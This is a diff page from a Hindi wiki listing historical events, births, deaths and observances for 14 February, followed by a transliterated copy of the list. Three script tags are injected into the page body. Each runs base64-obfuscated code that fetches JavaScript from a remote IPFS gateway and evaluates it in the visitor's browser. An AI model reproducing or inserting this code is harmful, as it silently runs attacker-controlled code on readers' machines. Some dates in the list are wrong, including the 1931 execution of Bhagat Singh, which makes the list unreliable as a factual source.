Difference between revisions of "14 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(25 intermediate revisions by 8 users not shown)
Line 4: Line 4:
  
 
==14 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==14 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 1537 - [[गुजरात]] के बहादुर शाह को पुर्तग़ालियों ने धोखे से गिरफ़्तार करने की कोशिश की और भागने के चक्कर में वह डूब गया।
 +
* 1556 - [[पंजाब]] के गुरदासपुर ज़िले के कलानौर में अकबर की ताजपोशी हुई।
 +
* 1628 - शाहजहाँ [[आगरा]] की गद्दी पर बैठा।
 +
* 1658 - [[दिल्ली]] की सत्ता हथियाने के लिए [[मुग़ल वंश]] के आपसी संघर्ष में दारा ने [[वाराणसी]] के पास बहादुरपुर की लड़ाई में शुजा को पराजित किया।
 +
* 1663 - कनाडा [[फ़्रांस]] का एक प्रान्त बना।
 +
* 1670 - रोमन कैथोलिक सम्राट लियोपोल्ड प्रथम ने यहूदियाें को वियना से बाहर किया।
 +
* 1743 - हेनरी पेलहम [[ब्रिटेन]] के वित्त विभाग के पहले प्रमुख बने।
 +
* 1846 - क्राको गणराज्य का विद्रोह पूरे पोलैंड में फैल गया।
 +
* [[1881]] - भारत के पहले होम्योपैथिक मेडिकल कॉलेज की कोलकाता में स्थापना।
 +
* [[1899]] - अमेरिकी कांग्रेस ने संघीय चुनाव में वोटिंग मशीन के इस्तेमाल को मंजूरी दी।
 +
* [[1893]] - हवाई अमेरिका का हिस्सा बना।
 +
* [[1912]] - [[इंग्लैंड]] में पहली बार डीजल इंजन वाली पनडुब्बी का जलावतरण किया गया।
 +
* [[1920]] - शिकागो में महिला मतदाता लीग की स्थापना की गयी।
 +
* [[1931]] - महान् क्रान्तिकारी [[भगत सिंह]], [[राजगुरु]] तथा [[सुखदेव]] को [[लाहौर]] के एक जेल में फाँसी दे दी गयी।
 +
* [[1943]] - सोवियत फ़ौजों ने जर्मन फ़ौजों से रोस्तोव पुन: छीन लिया।
 +
* [[1945]] - पेरू, पराग्वे, चिली और इक्वाडोर संयुक्त राष्ट्र के सदस्य बने।
 +
* [[1958]] - ईराक और जार्डन को मिलाकर बने फ़ेडरेशन के मुखिया शाह फ़ैजल बने।
 +
* [[1972]] - अमेरिका ने चीन के साथ व्यापार प्रतिबंधों में ढील की घोषणा की।
 +
* [[1978]] - अमेरिका ने मिस्र, सऊदी अरब और इसरायली को अरबों डॉलर के हथियार बेचने की घोषणा की।
 +
* [[1979]] - काबुल में अमेरिकी राजदूत एडोल्फ़ डक्स की मुस्लिम उग्रवादियों द्वारा हत्या।
 +
* [[1988]] - फ़िलिस्तीन मुक्ति संगठन के तीन वरिष्ठ अधिकारी बम विस्फोट से साइप्रस में मारे गए।
 +
* [[1989]] -
 +
**बेल्जियम के पूर्व प्रधानमंत्री पाल्क वाडेन को एक माह बाद फिरौती देने के बाद छोड़ा गया।
 +
**उच्चतम न्यायालय ने [[भोपाल गैस त्रासदी]] सम्बन्धी याचिका पर सुनवाई बंद की।
 +
** ग्लोबल पोजिशनिंग सिस्टम पर आधारित पहला उपग्रह अंतरिक्ष में पृथ्वी की कक्षा के पास स्थापित किया गया।
 
* [[1990]] - बंगलौर में इंडियन एयरलाइंस 605 पर सवार 92 लोग विमान दुर्घटना में मारे गये।
 
* [[1990]] - बंगलौर में इंडियन एयरलाइंस 605 पर सवार 92 लोग विमान दुर्घटना में मारे गये।
 +
* [[1992]] - सोवियत संघ से अलग हुए गणराज्यों में आधे से अधिक ने अलग सेना बनाने की घोषणा की।
 +
* [[1993]] - कपिल देव ने 400 विकेट और 5000 रनों का रिकार्ड बनाया।
 +
* [[1999]] - इम्फाल में पांचवे राष्ट्रीय खेलों की शुरुआत हुई।
 +
* [[2000]] - अंतर्राष्ट्रीय मुद्रा कोष के प्रबंध निदेशक माइकल कैमडेसस ने अपने 13 वर्षीय कार्यकाल के बाद अवकाश ग्रहण किया।
 
* [[2001]] - अल सल्वाडोर में भूकम्प, 225 मरे।  
 
* [[2001]] - अल सल्वाडोर में भूकम्प, 225 मरे।  
* [[2000]] - अंतर्राष्ट्रीय मुद्रा कोष के प्रबंध निदेशक माइकल कैमडेसस ने अपने 13 वर्षीय कार्यकाल के बाद अवकाश ग्रहण किया।
 
 
* [[2002]] - उमर शेख़ ने कहा, पर्ल जीवित नहीं, किन्तु तलाश जारी।  
 
* [[2002]] - उमर शेख़ ने कहा, पर्ल जीवित नहीं, किन्तु तलाश जारी।  
 
* [[2003]] - [[श्रीलंका]] के तेज गेंदबाज चामिंडा वास ने बांग्लादेश के ख़िलाफ़ खेलते हुए आठवें विश्व कप की पहली हैट्रिक बनाई।  
 
* [[2003]] - [[श्रीलंका]] के तेज गेंदबाज चामिंडा वास ने बांग्लादेश के ख़िलाफ़ खेलते हुए आठवें विश्व कप की पहली हैट्रिक बनाई।  
 +
* [[2004]] - जर्मन निदेशक की 'हेड आन' फ़िल्म को गोल्डन बीयर पुरस्कार मिला।
 +
* [[2005]] - प्रसिद्ध साहित्यकार डाक्टर विद्यानिवास मिश्र की सड़क दुर्घटना में मृत्यु।
 +
** वीडियो- शेयरिंग वेबसाइट यूट्यूब की शुरूआत हुयी।
 +
* [[2006]] - न्यायाधीशों के विरोध में सद्दाम हुसैन भूख हड़ताल पर गये।
 +
* [[2007]] - मध्य प्रदेश के तीन बार मुख्यमंत्री रहे श्यामाचरण शुक्ल का निधन हुआ।
 
* [[2008]]-  
 
* [[2008]]-  
 
**नैया मसूद को उनके कहानी संग्रह ''तऊस चमन की मैना'' के लिए वर्ष 2007 का '[[सरस्वती सम्मान]]' प्रदान किया गया।
 
**नैया मसूद को उनके कहानी संग्रह ''तऊस चमन की मैना'' के लिए वर्ष 2007 का '[[सरस्वती सम्मान]]' प्रदान किया गया।
 
**सिद्धार्थ सिन्हा की लघु भोजपुरी फ़िल्म उधेड़बुन की प्रतिष्ठित बर्लिन महोत्सव सिल्वरबेयर पुरस्कार प्रदान किया गया।
 
**सिद्धार्थ सिन्हा की लघु भोजपुरी फ़िल्म उधेड़बुन की प्रतिष्ठित बर्लिन महोत्सव सिल्वरबेयर पुरस्कार प्रदान किया गया।
 
* [[2009]] - [[सानिया मिर्ज़ा]] ने पटाया ओपन टेनिस के फाइनल में प्रवेश किया।
 
* [[2009]] - [[सानिया मिर्ज़ा]] ने पटाया ओपन टेनिस के फाइनल में प्रवेश किया।
 +
 
==14 फ़रवरी को जन्मे व्यक्ति==
 
==14 फ़रवरी को जन्मे व्यक्ति==
 
* 1483 - [[बाबर]] - [[मुग़ल]] सम्राट (मृत्यु- 1530)
 
* 1483 - [[बाबर]] - [[मुग़ल]] सम्राट (मृत्यु- 1530)
 +
* [[1875]] - [[अलेक्जेन्डर मडीमैन]] - राज्य परिषद के अध्यक्ष थे।
 
* [[1885]] - [[सैयद ज़फ़रुल हसन]] - प्रमुख मुस्लिम दार्शनिक (भारतीय/पाकिस्तानी) (मृत्यु- 1949)
 
* [[1885]] - [[सैयद ज़फ़रुल हसन]] - प्रमुख मुस्लिम दार्शनिक (भारतीय/पाकिस्तानी) (मृत्यु- 1949)
 +
* [[1908]] - [[के. हनुमंथैय्या]] - [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ थे।
 +
* [[1921]] - [[दामोदरम संजीवय्या]] - [[भारतीय राष्ट्रीय कांग्रेस]] के नेता, जो [[आंध्र प्रदेश के मुख्यमंत्री]] रहे।
 +
* [[1925]] - [[मोहन धारिया]], पूर्व केंद्रीय मंत्री एवं सामाजिक कार्यकर्ता।
 +
* [[1927]] - [[शिव चरण माथुर]] - [[राजस्थान]] के दसवें [[मुख्यमंत्री]] थे।
 
* [[1933]] - [[मधुबाला]] - भारतीय फ़िल्म [[अभिनेत्री]] (मृत्यु- 1969)
 
* [[1933]] - [[मधुबाला]] - भारतीय फ़िल्म [[अभिनेत्री]] (मृत्यु- 1969)
 +
* [[1937]] - [[दिलीपभाई रमणभाई पारिख]] - भारतीय राजनीतिज्ञ थे, जो [[गुजरात]] के भूतपूर्व 13वें [[मुख्यमंत्री]] रहे।
 +
* [[1938]] - [[कमला प्रसाद]]- [[हिन्दी]] के प्रसिद्ध आलोचक
 +
* [[1952]] - [[सुषमा स्वराज]] - [[भारतीय जनता पार्टी]] की शीर्ष महिला राजनीतिज्ञ।
 
* [[1962]] - [[सकीना जाफ़री]] - भारतीय अभिनेत्री
 
* [[1962]] - [[सकीना जाफ़री]] - भारतीय अभिनेत्री
  
 
==14 फ़रवरी को हुए निधन==
 
==14 फ़रवरी को हुए निधन==
 +
* [[2007]] - [[श्यामा चरण शुक्ल]] - [[मध्य प्रदेश]] के भूतपूर्व [[मुख्यमंत्री]] थे।
 +
* [[2005]] - [[विद्यानिवास मिश्र]] - [[हिन्दी]] के प्रसिद्ध साहित्यकार, सफल सम्पादक, [[संस्कृत]] के प्रकाण्ड विद्वान् और जाने-माने भाषाविद।
 +
* [[1964]] - [[वी.टी. कृष्णमाचारी]] - भारतीय सिविल सेवक और प्रशासक थे।
 +
* [[1834]] - [[सर जॉन शोर]] - सन 1793 से 1798 ई. तक [[भारत]] का [[गवर्नर-जनरल]] रहा।
  
 
==14 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==14 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 +
* उत्पादकता सप्ताह।
 +
* [[वेलेंटाइन दिवस|सेंट वैलेंटाइन दिवस]]
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-today-14-02-2017/today-in-history/news/779845.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 11:55, 10 December 2020

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 14 faravari varsh ka 45 vaan din hai. sal mean abhi aur 320 din shesh haian. (lip varsh mean 321 din)

14 faravari ki mahattvapoorn ghatanaean

  • 1537 - gujarat ke bahadur shah ko purtagaliyoan ne dhokhe se giraftar karane ki koshish ki aur bhagane ke chakkar mean vah doob gaya.
  • 1556 - panjab ke guradasapur zile ke kalanaur mean akabar ki tajaposhi huee.
  • 1628 - shahajahaan agara ki gaddi par baitha.
  • 1658 - dilli ki satta hathiyane ke lie mugal vansh ke apasi sangharsh mean dara ne varanasi ke pas bahadurapur ki l daee mean shuja ko parajit kiya.
  • 1663 - kanada fraans ka ek prant bana.
  • 1670 - roman kaitholik samrat liyopold pratham ne yahoodiyaean ko viyana se bahar kiya.
  • 1743 - henari pelaham briten ke vitt vibhag ke pahale pramukh bane.
  • 1846 - krako ganarajy ka vidroh poore polaiand mean phail gaya.
  • 1881 - bharat ke pahale homyopaithik medikal k aaulej ki kolakata mean sthapana.
  • 1899 - ameriki kaangres ne sanghiy chunav mean votiang mashin ke istemal ko manjoori di.
  • 1893 - havaee amerika ka hissa bana.
  • 1912 - ianglaiand mean pahali bar dijal ianjan vali panadubbi ka jalavataran kiya gaya.
  • 1920 - shikago mean mahila matadata lig ki sthapana ki gayi.
  • 1931 - mahanh krantikari bhagat sianh, rajaguru tatha sukhadev ko lahaur ke ek jel mean phaansi de di gayi.
  • 1943 - soviyat faujoan ne jarman faujoan se rostov pun: chhin liya.
  • 1945 - peroo, paragve, chili aur ikvador sanyukt rashtr ke sadasy bane.
  • 1958 - eerak aur jardan ko milakar bane fedareshan ke mukhiya shah faijal bane.
  • 1972 - amerika ne chin ke sath vyapar pratibandhoan mean dhil ki ghoshana ki.
  • 1978 - amerika ne misr, soodi arab aur isarayali ko araboan d aaular ke hathiyar bechane ki ghoshana ki.
  • 1979 - kabul mean ameriki rajadoot edolf daks ki muslim ugravadiyoan dvara hatya.
  • 1988 - filistin mukti sangathan ke tin varishth adhikari bam visphot se saipras mean mare ge.
  • 1989 -
    • beljiyam ke poorv pradhanamantri palk vaden ko ek mah bad phirauti dene ke bad chho da gaya.
    • uchchatam nyayalay ne bhopal gais trasadi sambandhi yachika par sunavaee band ki.
    • global pojishaniang sistam par adharit pahala upagrah aantariksh mean prithvi ki kaksha ke pas sthapit kiya gaya.
  • 1990 - bangalaur mean iandiyan eyaralaians 605 par savar 92 log viman durghatana mean mare gaye.
  • 1992 - soviyat sangh se alag hue ganarajyoan mean adhe se adhik ne alag sena banane ki ghoshana ki.
  • 1993 - kapil dev ne 400 viket aur 5000 ranoan ka rikard banaya.
  • 1999 - imphal mean paanchave rashtriy kheloan ki shuruat huee.
  • 2000 - aantarrashtriy mudra kosh ke prabandh nideshak maikal kaimadesas ne apane 13 varshiy karyakal ke bad avakash grahan kiya.
  • 2001 - al salvador mean bhookamp, 225 mare.
  • 2002 - umar shekh ne kaha, parl jivit nahian, kintu talash jari.
  • 2003 - shrilanka ke tej geandabaj chamianda vas ne baangladesh ke khilaf khelate hue athavean vishv kap ki pahali haitrik banaee.
  • 2004 - jarman nideshak ki 'hed an' film ko goldan biyar puraskar mila.
  • 2005 - prasiddh sahityakar daktar vidyanivas mishr ki s dak durghatana mean mrityu.
    • vidiyo- sheyariang vebasait yootyoob ki shurooat huyi.
  • 2006 - nyayadhishoan ke virodh mean saddam husain bhookh h datal par gaye.
  • 2007 - madhy pradesh ke tin bar mukhyamantri rahe shyamacharan shukl ka nidhan hua.
  • 2008-
    • naiya masood ko unake kahani sangrah toos chaman ki maina ke lie varsh 2007 ka 'sarasvati samman' pradan kiya gaya.
    • siddharth sinha ki laghu bhojapuri film udhe dabun ki pratishthit barlin mahotsav silvarabeyar puraskar pradan kiya gaya.
  • 2009 - saniya mirza ne pataya opan tenis ke phainal mean pravesh kiya.

14 faravari ko janme vyakti

14 faravari ko hue nidhan

14 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>